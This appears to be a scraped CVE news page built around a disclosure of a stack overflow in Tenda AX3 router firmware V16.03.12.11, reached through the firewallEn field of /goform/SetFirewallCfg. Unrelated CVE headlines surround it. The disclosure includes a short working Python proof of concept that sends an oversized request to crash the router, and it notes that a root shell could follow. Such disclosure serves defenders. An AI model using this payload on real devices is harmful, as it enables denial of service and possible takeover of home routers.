CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

CVE-2023-6905

CVE-2023-6903

CVE-2023-6904

CVE-2023-3907

Tenda AX3 V16.03.12.11 is vulnerable to Buffer Overflow via /goform/SetFirewallCfg.

Permalink

**Tenda AX3 V16.03.12.11 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
*   Firmware download address ：https://www.tenda.com.cn/download/detail-3476.html

**Affected version**

**Vulnerability details**

In /goform/SetFirewallCfg, The user can input firewallEn data into var. When the data entered by the user is greater than 3, the user input data will be strcpyed into the variable firewall\_buf. It is worth noting that there is no size detection, resulting in stack overflow.

**Poc**

import requests

url \= "http://192.168.0.1/goform/SetFirewallCfg"

firewallEn \= "a" \* 0x20000

r \= requests.post(url, data\={'firewallEn': firewallEn})
print(r.content)

Then you can see the router crash, and finally you can write exp to get rootshell

Headline

CVE-2023-27042: vuln/readme.md at main · hujianjie123/vuln

CVE: Latest News